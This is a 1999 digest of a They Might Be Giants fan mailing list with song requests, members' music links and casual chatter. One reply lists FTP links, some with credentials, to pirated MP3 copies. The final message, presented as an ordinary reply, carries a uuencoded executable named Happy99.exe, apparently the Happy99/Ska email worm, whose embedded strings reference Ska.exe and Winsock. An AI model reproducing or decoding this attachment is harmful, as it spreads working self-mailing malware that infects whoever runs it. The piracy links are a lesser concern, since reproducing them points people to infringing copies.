31 Mar 1999 10:17:18 -0700 Ok..I checked out that James Kochalka Superstar guy, and now I have that It's My Dink song stuck in my head! Good lord, this guy needs help. Thanks for reccommending him. :0) Signed, Nick Wolf, TMBG Ambassador to the State of New Mexico, who has a Dink, too. My Shoutcast channel is at 129.138.34.90:7050. No guarantee it'll be up all the time, but at least it's a start, no? Oh yeah. Visit www.geocities.com/SunsetStrip/Amphitheatre/5550 The first Julie Plug tribute page in history!!! [Attachment omitted, unknown MIME type or encoding (text/html)] ------------------------------ Message-ID: <002b01be7b9a$60f98d60$99b3a4c1@squid> From: "Uncle Squid" Subject: TMBG: non-tmbg: Grosse Pointe Blank Date: Wed, 31 Mar 1999 18:17:27 +0100 Grosse Pointe Blank is one of my fave movies of all time and I am pleading with all of you out there to help me find the theme tune by The Violet Femmes called "Twister in the Sun" (I think I got the band/title spelt right, but probably not). You guys seemed to be the people to ask. MP3 format would be G-R-E-A-T! Please help, it's such a good song. -- Uncle Squid: If the milk turns out to be sour, I aint the kind of pussy to drink it! Uncle Squid's new site: www.keme.net/~thelimes/uncle_squid/ Other sites by Uncle Squid: http://members.xoom.com/_out_there_/ ||| ICQ: 12605535 ||| Tel: (01206) 502043 ||| Fax: (01206) 514682 ||| [Attachment omitted, unknown MIME type or encoding (text/html)] ------------------------------ Message-ID: <000d01be7b9c$ad9832a0$5a228a81@rcn.nmt.edu> From: "Refund" Subject: Re: TMBG: non-tmbg: Grosse Pointe Blank Date: Wed, 31 Mar 1999 10:34:06 -0700 ftp://mp3:mp3@129.252.201.74:977/d:/mp3/violent femmes/Violent Femmes_Blister In The Sun.mp3 ftp://mp3:mp3@24.95.202.28/e:/mp3/(Violent Femmes)-Blister In The Sun.mp3 ftp://mp3:dir@24.0.231.194/d:/mp3's/upload here/violent femmes - blister in the sun.mp3 ftp://minerva.dodds.net/Pub/Sounds/Mp3/Violent Femmes - Blister In The Sun.mp3 ftp://138.87.201.99/stuff/Misc/Violent Femmes- Blister In The Sun.mp3 ftp://anonymous:anonymous@204.50.108.125/mp3stuff/Mp3 Singles/Violent Femmes-Blister in the Sun.mp3 ftp://24.2.134.100/Mp3z/Singles/Violent Femmes_Blister in the Sun.mp3 ftp://leech:leech@207.75.244.232/d:/warez/mp3/80's/Violent Femmes-Blister in the Sun.mp3 ftp://mp3:mp3@24.226.143.223:5345/c:/sound/!!! Unsorted mp3z !!!/Blister In The Sun Acoustic.mp3 There you go. The rest I found were on Ratio sites, so... :0) Enjoy. Signed, Nick Wolf, TMBG Ambassador to the State of New Mexico. ----- Original Message ----- From: Uncle Squid To: TMBG MAIL LIST Sent: Wednesday, March 31, 1999 10:17 AM Subject: TMBG: non-tmbg: Grosse Pointe Blank Grosse Pointe Blank is one of my fave movies of all time and I am pleading with all of you out there to help me find the theme tune by The Violet Femmes called "Twister in the Sun" (I think I got the band/title spelt right, but probably not). You guys seemed to be the people to ask. MP3 format would be G-R-E-A-T! Please help, it's such a good song. -- Uncle Squid: If the milk turns out to be sour, I aint the kind of pussy to drink it! Uncle Squid's new site: www.keme.net/~thelimes/uncle_squid/ Other sites by Uncle Squid: http://members.xoom.com/_out_there_/ ||| ICQ: 12605535 ||| Tel: (01206) 502043 ||| Fax: (01206) 514682 ||| [Attachment omitted, unknown MIME type or encoding (text/html)] ------------------------------ Date: Wed, 31 Mar 1999 09:40:01 -0800 (PST) From: winningh Subject: Re: TMBG: non-tmbg: Grosse Pointe Blank Message-ID: On Wed, 31 Mar 1999, Uncle Squid wrote: > Grosse Pointe Blank is one of my fave movies of all time and I am pleading with all of you out there to help me find the theme tune by The Violet Femmes called "Twister in the Sun" (I think I got the band/title spelt right, but probably not). You guys seemed to be the people to ask. MP3 format would be G-R-E-A-T! Please help, it's such a good song. > Wow, what a difference living on a another continent makes. Blister In the Sun by the Violent Femmes, is ubiquitous to people of our generation in America, so you should have very little trouble finding it on the web. However I reccomend ferreting out their album (self-titled) instead, or the Grosse Pointe Blank soundtrack, which is pretty good despite having a stupid Blister 2000 remix as well. Sarah Winningham Just because I never post doesn't mean I don't love each and every one of ya lil' bastiches ------------------------------ Message-Id: <3.0.6.32.19990331164448.008d7df0@pop.mindspring.com > Date: Wed, 31 Mar 1999 16:44:48 -0600 From: El Dee Bee Subject: TMBG: nontmbg: New Idol Virus song. Hey folks. Go check out my new song, Another story untold at http://www.mp3.com/artists/2/the_idol_virus.html Have fun, Shaughn (ldb) -- http://www.lucidx.com/is My egotistical webpage, links to all the webpages I don't keep in my sig. -- http://www.mp3.com/idolv Download some of my music. -- http://members.xoom.com/MaxxIda/ The Official Sam Kieth Webpage - The Maxx IDA -- Contemporary Cartoon Militia is (C) & TM 1998 S. Steven Struble and Kris W. M. Struble. | The Li'l Depressed Boy, Phreeck, Spyder Hunt, and all related characters (C) & TM 1998 S. Steven Struble ------------------------------ Message-Id: <3.0.6.32.19990331194634.008d9a50@pop.mindspring.com > Date: Wed, 31 Mar 1999 19:46:34 -0600 From: El Dee Bee Subject: Re: TMBG: nontmbg: New Idol Virus song. At 04:44 PM 3/31/99 -0600, you wrote: >Hey folks. Go check out my new song, Another story untold at >http://www.mp3.com/artists/2/the_idol_virus.html > Oh, and I forgot to mention. For you people who really like my music, now you can buy my CD. YAY! Shaughn (LDB) -- http://www.lucidx.com/is My egotistical webpage, links to all the webpages I don't keep in my sig. -- http://www.mp3.com/idolv Download some of my music. -- http://members.xoom.com/MaxxIda/ The Official Sam Kieth Webpage - The Maxx IDA -- Contemporary Cartoon Militia is (C) & TM 1998 S. Steven Struble and Kris W. M. Struble. | The Li'l Depressed Boy, Phreeck, Spyder Hunt, and all related characters (C) & TM 1998 S. Steven Struble ------------------------------ Date: Thu, 01 Apr 1999 03:04:39 -0600 From: Bob Scott Message-ID: <370336A6.DF57AC70@tmbg.org> Organization: They Might Be Giants, Unofficially http://www.tmbg.org Subject: TMBG&NON-TMBG:The Lie and Everything after Firstly, I want to apologize to everyone for my recent drab and boring posts. I've been preoccupied with certain friends flipping out and threatening bodily harm to themselves. Secondly, I would like to finally put to rest all these Mike Leffel shenanigans. Obviously, no such person has ever existed in my knowledge outside of old list digests, and I've simply been perpetuating the lie that I was he since the return I proclaimed in January. Many of you suspected that something strange was going on, and I say "Right on!" You couldn't have been more correct. Mike Leffel lives somewhere in the state of Nebraska, so do I. That is the only link that there is between myself and he. Thirdly, is it true that TMBG has managed to land the song "Become a Robot" on the "Inspector Gadget" soundtrack? If so, I must say there is something to look forward to with the release of the movie. Finally, I would like to alert you all to the release of my book in stores on April 15 of this year. I put plenty of time and effort into it, and even mention TMBG on page 42 (DA tribute, too!). They just happen to be the favorite band of my main character, Larry Spool. The title of the book: "The End of the World and Everything After". Look for it! Well, I've just alienated myself from the universe now. I'll go back to my cold, heartless calculating. bobscott@tmbg.org AKA Bob "Sticking with this story for today" Scott ------------------------------ Message-ID: <003301be7c1e$d799da40$c9b3a4c1@squid> From: "Uncle Squid" Subject: Re: TMBG: non-tmbg: Grosse Pointe Blank Date: Thu, 1 Apr 1999 10:05:42 +0100 >Just because I never post doesn't mean I don't love each and every one of >ya lil' bastiches A Lobo reader no? Me too... kick-ass! -- Uncle Squid: If the milk turns out to be sour, I aint the kind of pussy to drink it! Uncle Squid's new site: www.keme.net/~thelimes/uncle_squid/ Other sites by Uncle Squid: http://members.xoom.com/_out_there_/ ||| ICQ: 12605535 ||| Tel: (01206) 502043 ||| Fax: (01206) 514682 ||| ------------------------------ Date: Thu, 1 Apr 1999 10:12:12 +0100 Message-Id: <199904010912.KAA24590@ns3.keme.net> From: "Uncle Squid" Subject: Re: TMBG: non-tmbg: Grosse Pointe Blank begin 644 Happy99.exe M35I0``(````$``\`__\``+@`````````0``:```````````````````````` M``````````````````````$``+H0``X?M`G-(;@!3,TAD)!4:&ES('!R;V=R M86T@;75S="!B92!R=6X@=6YD97(@5VEN,S(-"B0W```````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````````````````````````````````````````%!%``!,`00`GR77C@`` M````````X`".@0L!`AD`"@```!8```````````$````!`````@```$`````! M```"```!``````````,`"@`````````%```$`````````@``````$```(``` M```0```0````````$``````````````````#`$`#```````````````````` M``````````````````0`:`$````````````````````````````````````` M```````````````````````````````````````````````````````````` M````````````0T]$10``````$``````!```*````!@`````````````````` M(```8$1!5$$``````!```````@``$````!```````````````````$```,`N M:61A=&$````0``````,```0````@``````````````````!```#`+G)E;&]C M````$``````$```"````)```````````````````0```4``````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M````````:`!X``!J0.C6"```A<`/A!T&``!0O^L.0@"K!6!M``"K!<@```"K M6%!04%^XE````*OHMP@``%Z#QA"M@_@`#X3L!0``OLD-0@!67[F5````K/;0 MJN+Z:,@```#_->\.0@#HC0@``(7`#X2W!0``H_<.0@!HR````/\U\PY"`&H` MZ%8(``"%P`^$F`4``(LU\PY"``/P@^X%K"3?/$%U"L<%B@]"`/____^^(PY" M`(L][PY"``,]]PY"`+D)````\Z1J`?\U[PY"`/\U\PY"`.CO!P``O@``0@"+ M/>L.0@"M/45.1"!T%3U:15)/=`7WT*OK[*V+R#/`\ZOKXXO/*PWK#D(`B0W[ M#D(`OAH.0@"+/>\.0@`#/?<.0@"Y"0```/.D,\!0:(````!J`E!0:````$#_ M->\.0@#HNP<``$`/A.L$``!(H_\.0@!J`&C[#D(`_S7[#D(`_S7K#D(`_S7_ M#D(`Z$('``"%P`^$M`0``+X-#D(`BSWO#D(``SWW#D(`N0T```#SI(LU[PY" M`(L]\PY"`(L-]PY"`(/!"?.DN'-K80"K:@'_-?,.0@#_->\.0@#H"@<``#/` M4&B`````:@-04&@```#`_S7O#D(`Z"0'``!`=5(SP/\UZPY"`&@'#T(`4&@_ M`!\`4%!0:"P.0@!H`@``@.@@!P``N`@```!0N",.0@!`4&H!:@!0_S4'#T(` MZ/T&``#_-0#D(`,\!04%!J!%#_-5X.0@#HI`8` M`(7`#X3/`P``HV8.0@`SP%!04&H&_S5F#D(`Z*D&``"%P`^$I0,``*-J#D(` MB_!F@3Y-6@^%DP,``(!^$GH/A(D#``#&1A)Z`W8\9H$^4$4/A7<#``")-7(. M0@!FBT8&9J-V#D(`,\EFBPUV#D(`9HM&%&:C>`Y"`(O>@\,8,\!F`P5X#D(` M`]B+`STN=&5X=",]+F5D870//2YD871T68/#*$EUX^M>BT,,*T,4HWH.0@#K MY/=#)"```&`/A"P#``"!2R0```"`B1V>#D(`BT,0BWL(*\<]R@````^"#`,` M`(M##(M3%"O"HWX.0@`#UXD5D@Y"`.N9BT,,*T,4HX(.0@#KFK^&#D(`BQ5Z M#D(`BUYXBS5J#D(`*]H#WHM#'"O"`\:KBT,@*\(#QJN+0R0KP@/&JXM+&#/2 MBS6*#D(`QP6B#D(``````(L>*QUZ#D(``QUJ#D(`BP,]8V]N;G0@/7-E;F1T M8D*#Q@1)==N#/:(.0@`"#X5Q`@``Z9(```"#PP2+`SUE8W0`==M25HL=C@Y" M`-'B`]HSP&:+`XLUA@Y"`,'@`@/PBP:CE@Y"`*&2#D(``P5^#D(`@\``B0;_ M!:(.0@!>6NN>@\,$B@,\`'654E:+'8X.0@#1X@/:,\!FBP.+-88.0@#!X`(# M\(L&HYH.0@"AD@Y"``,%?@Y"`(/`1XD&_P6B#D(`7EKI5?___XLUG@Y"`(%& M",H```!HJ@Y"`.A0!```A<`/A)H!``"CI@Y"`&BW#D(`_S6F#D(`Z#\$``"% MP`^$?0$``*/?#D(`:,0.0@#_-:8.0@#H(@0``(7`#X1@`0``H^,.0@!HT`Y" M`/\UI@Y"`.@%!```A<`/A$,!``"CYPY"`(L]D@Y"``,]:@Y"`.C*````G&#H M`````%^!Q[T```"+7"0LBD,#/!EU"(M$)"BJ1^L*/'=U&T>+1"0HJN@(```` M4VMA+F1L;`"X_______0JV&=Z0````"<8.@`````7H/&=F:MBUPD*#KC=!`Z MPW0"ZUOH#P```&UA:6P`Z`4```!N97=S`*U0N/______T(7`=#K_T#P!=#1F MD^@`````7H/&-%9?,\"`^TYU"D>JK#P`=1E&ZPV`^TUU$:I'1JP\`'4)K5"X M_______089WI`````````````%ZYR@```/.DH=\.0@")AV____^AYPY"`(E' MKZ'C#D(`B4?MBQ5^#D(`H9(.0@`#PH/`1BL%E@Y"`/?0B8=Y____H9(.0@`# MP@7#````*P6:#D(`]]")1_;_-6H.0@#HH@(``/\U9@Y"`.CE`@``_S5>#D(` MZ-H"``#_->L.0@#HU0(``(,]B@]"``!T!VK_Z(\"``!H``("`&I`Z)4"``"C MZPY"`&H`Z&4"``"C?@]"`*,;#T(`N.<'00"C#P]"`,<%+P]"`&L.0@!15E^#QQ2+1@BKBT8,JX$&`!```*T!1@2M M`48$K<'X$(O0K<'X$(O8K8/X`'4%@\8(ZTF`;OP!K<'X$(O0K<'X$%9J`%)0_S5C M#T(`Z-L!``!>@\8$64D/A7G_____!5,/0@#I-/___X,]-P]"`!)T%K@S#T(` M4%#HJ0$``.B&`0``Z17_____-6,/0@#_-8(/0@#H4@$``,<%B@]"`/_____I M/_[__UBCA@]"`(-\)`0"=0MJ`.@[`0``,\#K!>A*`0``BPV&#T(`4<.A3P]" M`(/@#Z-/#T(`P>`-BSWK#D(``_BY``$``.AF````P>@(HUL/0@#H60```,'H M"*-7#T(`Z$P```#!Z`@-#P^O`(O8Z#T```#!Z`^)!XE/!-M'!-G^V@_;1P39 M_]H/VQ_;7P2#QPBA5P]"`*NA6P]"`*N+PZN#QPSBR?\%3P]"`.EW_O__N!-` M(0#W+5\/0@`KT@41$%,"HU\/0@##_R5D`$,`_R5H`$,`_R5L`$,`_R5P`$,` M_R5T`$,`_R5X`$,`_R5\`$,`_R6``$,`_R6$`$,`_R6(`$,`_R6,`$,`_R60 M`$,`_R64`$,`_R68`$,`_R6<`$,`_R6@`$,`_R6D`$,`_R6H`$,`_R6P`$,` M_R6T`$,`_R6X`$,`_R7``$,`_R7$`$,`_R7(`$,`_R7,`$,`_R70`$,`_R74 M`$,`_R78`$,`_R7<`$,`_R7@`$,`_R7D`$,`_R7H`$,`_R7P`$,````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`+*EK__]____^__P_P``__]'_________[__Y?]:15)/"````/_^__]%[__Q MX$OV,MY'_K,RWF]OJY>6C-^/C9"8C9Z2WY**C(O?G9K?C8J1WXJ1FYJ-WZB6 MD]/[]YO_U M____]____________O____[____]____O_____[___W___[__________/_U M__________G___O________]____6D523P(```#__^___^_________O____ M___[_Z________S_D_[__UI%4D\&````___Z_Q/___]:15)/%````+RPN[K_ M_____^_______O__]?____G__UI%4D\#````W___G[N^J[[______^______ M_?___?___^___UI%4D\#````O___/]&6FYZ+GO___^_______/___?___^W_ M_UI%4D\#````O___/]&:FYZ+GO___^______^____?___^O__UI%4D\#```` MO___O]&-FI.0G/___^______^O___?___^G__UI%4D\#````O___KUI%4D_0 M````?(/;]_^+LGR#V_?^B_T4L$'#_[W_J:!&RO___U,)+U4=!9?_W___E;\7 M9_?__WH_BOO,/Q310&;_O?]4^D?T__]4^D?T__]4^A?\__]4?#^;5!3T`,IF M_[W_%Y+W__]'_O___SWS_Q>4^O__?`:;\'AU____=/S:("`@(,*ROK:SBLUT MO/O:`"`@(,+?N:VPBMR9=+SWF=H@`)G"LL6*ZG0,=,)>_[W_=O+__[W_#%L6 M@/[__W3\VB`@("#"K;ROJXK(=+S[V@`@(`#"WZNPQ8K7%T_X__]V\OO_O?\7 M(O[__WP'__![MO[__SCZ:O^]_P`````6SO[__Q;*_O__%\'\__]\!__P>MC^ M__]TRF+_O?^94IG"___P>^K^__]\PFK_O?__\'H*____%U#[__]>?O^]_W3B M9O^]_Q>6^___?`<`\'L/____%T_[__]'^O___T3E_[W_%[/[__]\!P#P>RS_ M__\7!_G__\+-RL_?\'H\____1_G___]$]_^]_Q?;^___?`<`\'M4____%R_Y M___"S_[W_%P3\__]\!P#P>WW___\76/G__\+- MRL_?BHETRF+_O?]TZE[_O?]\%3^?__PLW*S]^*Q!0M1_G___]$\?^]_Q=E_/__?`<`B]H7M?G_ M_\+,RLO?BN8X^FK_O?______=,)B_[W_S#]41_[___\\1[*RLK(\%VW\__]\ M!IN-EA<,_O__?`?_BJ`7>/S__UY^_[W_=.)F_[W_%[[\__]\!P"+M!=S_/__ M1_K___]$Y?^]_Q?7_/__?`<`B\T7)_K__\+-R\_?BME'^?___T3K_[W_%_?\ M__]\!P"+[1='^O__PLS+S]^*^4?^____/$>QL;&Q/)]T%)6;`,I6_[W_%P[Z M__]Z/_![F/[__UR"_[W_09G_O?]TPE;_O?_\PH+_O?]&]/___PQ;E?^7?___ M_Y7[E?^5_Y?___\_`,I6_[W_%QKZ__^_\'O9_O__MUR*_[W_E\WK__^5OQ=C M^O__>C_P>_[^__]<>O^]_Y7_EX;_O?^7_^O__P#*>O^]_P#*BO^]_Q>!^O__ M>C_P>QW___]^PH;_O?__Z___C<@`RHK_O?\7=OK__Y7_EW____^5_97_E?^7 M____/P#*5O^]_Q>9^O__O_![6/___[=NJ`Q;F4?R]9E4H*:5_Y>&_[W_KJ@`RHK_O?\7'OO_ M_Q3B`,IZ_[W_%TG[__\`RHK_O?\7)/O__YY'`````#P`RGK_O?\79OO__P#* MBO^]_Q=!^___GLP_/)]T#'0!_`9T,'P^F\PMF73AF7X<("!T$9E^!+FMB[ET M"IE^!*RJBZQT"IE^!+&ZBX]T"IE^!+R\\'MF____=`J9?@2]O/![5O___W0* MF7X$\O7P>T;___]T"KG$#O!\&____Q16F5)2VB`@``#"L++%WXI4%RK___\4 M;)E24MH@("`@PKVUNKR*85+:(```_\*KQ=__BFX73?___Q:2````F5)2VB`@ M("#"J*RXK8I^4MH@("`@PK"JKZSP>H\```"94IG"Q=_P>IL````7@____Q;( M````F5)2V@``___"Q=____!ZJP```!>@____%N4```"94E+:(```_\*\Q=__ M\'J[````%[W___\6`@$``%+"\O7R]?!ZQ````*]'I]*LCU1'GI&,E%1'GL7? MIE291YJ,F51\/?&G5+V]=NI^_[W_GLP_/)Y'`````#QT"G3"9O^]__P%4U6] M?@5Y]/__B/O#]8H./'07E?^OK`#*Q7^__^W7([_O?^7V/^]_P#*CO^] M_Q>3_?__O_![/?[__[=C_P>XO^__]O^]_P#ZS_^]_T(7_/__?,+/ M_[W__HKY=-++_[W_=#IT(1=]`@``?`<`B_7\"@#RS_^]_XHK`,K<_[W_%UW_ M__\`RN#_O?\74/___P#*CO^]_Q=;____`,IZ_[W_%Y;___\\E?^5PP#*6O^] M_P#*3DY+F5X90T*8`T*96YD#0I< M4VMA+F5X90!<;&ES=&4NCX^6D9B^_____[B:BZR&C(N:DKN6C9JD[Z3DY"<_____[.0G)Z3N8V:FO___ZV:GINYEI.:_____[*>CZF6FHBP MF;F6DYK___^LFHNYEI.:KY"6D8N:C?____^JD9*>CZF6FHBPF;F6DYK___^H MC9:+FKF6DYK___^XFHNYEI.:K):%FO___[R-FIZ+FKF6DYJ^____O).0C)JW MGI&;DYK_6D523R@```##__O__O____W____]____U__[_\__^__'__O_F/_^ M_[_]_O^Y__O_M/_[_____O^2GIN3D]&[L[/_DIZ6D_^1FHB,_UI%4D]L```` M___^_Q/____NS\C/J<];SU7/)L\2S_#.WL[-SL?.JLZ"SE_.6/)TEQY7'C\=_QW7'3\=)QT/'/<WXF6C8J,T]^>WXB0C9+3WY[? MBXV0E9Z1P-^RL*JKTK*PJJO?MX:=C9:;W]>W\[&QL;1_Z.( MC)"T9N3D_^CK)2>T9J'FO^LD)F+B)Z-FJ.REIR-D(R0 MF8NCJ):1FY"(C*.\BHV-FI&+J9J-C):0D:.MBI&PD9R:_P`````````````` M```````````````````````````````````````````````````````````` M``````````````````````````!+15).14PS,BYD;&P`3&]A9$QI8G)A2!.97<@665A`@,`\`(# M``(#`P`0`P,`(`,#```````T`P,``````$M%4DY%3#,R+F1L;`!!1%9!4$DS M,BYD;&P`55-%4C,R+F1L;`!'1$DS,BYD;&P`````5W)I=&5&:6QE````56YM M87!6:65W3V9&:6QE````1V5T5VEN9&]W4$`````1V5T36]D M=6QE2&%N9&QE00````!#;W!Y1FEL94$```!'9710&ET4')O8V5S$$```!'9713>7-T96U$:7)E8W1O$$` M``!296=#;&]S94ME>0```%)E;&5A3%_,8PQDC&8,:LQL3'-,=TQXC'P,04R$C(=,BTR.S)-,EHR;#*; M,J4RKC*X,L8R\C(.,RXS-C-#,THS4#-9,X`SAC.2,Y@SM3/5,^0S\#/U,_LS M!C0;-"HT-C0[-$$T3#19-&4T=S1\-((TE#29-)\TL32V-+PTSC34--HTMC7! M-(U[S7\-0(-Y\WJC>R-\DWSS?:-^DW!C@-.!4X'C@R M.#\X=CA\.(LXFSBG.*XXM#BZ.,`XQCC,.-(XV#C>..0XZCCP./8X_#@".0@Y M#CD4.1HY(#DF.2PY,CDX.3XY1#E*.5`Y5CE<.6(Y:#EN.0`````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` *```````````````` ` end ------------------------------ End of tmbg-list Digest #16-29 ******************************